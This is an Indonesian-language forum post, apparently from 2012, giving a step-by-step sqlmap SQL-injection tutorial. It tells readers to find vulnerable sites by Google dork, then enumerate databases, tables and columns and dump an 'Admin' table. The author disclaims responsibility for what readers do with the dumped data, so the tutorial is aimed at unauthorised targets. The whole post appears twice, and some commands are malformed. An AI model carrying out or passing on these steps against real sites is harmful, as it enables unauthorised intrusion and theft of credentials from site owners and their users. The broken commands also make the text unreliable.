11-08-2012, 04:53 PM
SQLi Sqlmap.py
ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...
ok langsung aja dari pada lama2..
yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...
hihihiihih tongue
ok serius nie..
1.buka SQL Map kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...
3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...
4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..
5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns
Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump
kalo udah begini silakan dah..
mau kalian apain tapi yang jelas w kgk tanggung jawab ya..
wkwkwkkwkwkkwk
:ngakak:
udah jangan lupa
:kasihcendol:
wkwkkwkwk
salam veronochi
dan w hanya mau berbagi kepada orang-orang yang mau belajar... [/font]
ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...
ok langsung aja dari pada lama2..
yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...
hihihiihih tongue
ok serius nie..
1.buka SQL Map kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...
3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...
4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..
5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns
Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump
kalo udah begini silakan dah..
mau kalian apain tapi yang jelas w kgk tanggung jawab ya..
wkwkwkkwkwkkwk
:ngakak:
udah jangan lupa
:kasihcendol:
wkwkkwkwk
salam veronochi
dan w hanya mau berbagi kepada orang-orang yang mau belajar... [/font]